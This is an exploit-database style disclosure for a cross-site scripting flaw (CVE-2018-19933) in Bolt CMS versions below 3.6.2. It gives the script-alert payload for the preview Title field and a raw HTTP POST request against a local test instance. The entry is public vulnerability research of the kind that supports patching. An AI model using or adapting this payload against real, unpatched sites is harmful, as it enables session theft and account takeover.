ExploitFixes
Bolt CMS < 3.6.2 - Cross-Site Scripting 2018-12-19 18:05:06

# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-18
# Exploit Author: Raif Berkay Dincel [ author=9567 ]
# Contact: www.raifberkaydincel.com
# Vendor Homepage: bolt.cm
# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
# Affected Version: [ < 3.6.2 ]
# CVE-ID: CVE-2018-19933
# Tested on: Parrot Security OS / Linux Mint / Windows 10

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
# Attack Pattern: <script>alert("Raif")</script>

# Description

Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.

# PoC [Video]: https://youtu.be/3eTPyIpjCJg

# Proof of Concepts:

POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit[_token]=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=&slug=script-alert-raif-script&image[file]=&files[]=&teaser=&body=&template=&taxonomy[groups][]=&taxonomy-order[groups]=0&id=&status=draft&datepublish=2018-12-07+00:12:05&datedepublish=&ownerid=1&_live-editor-preview=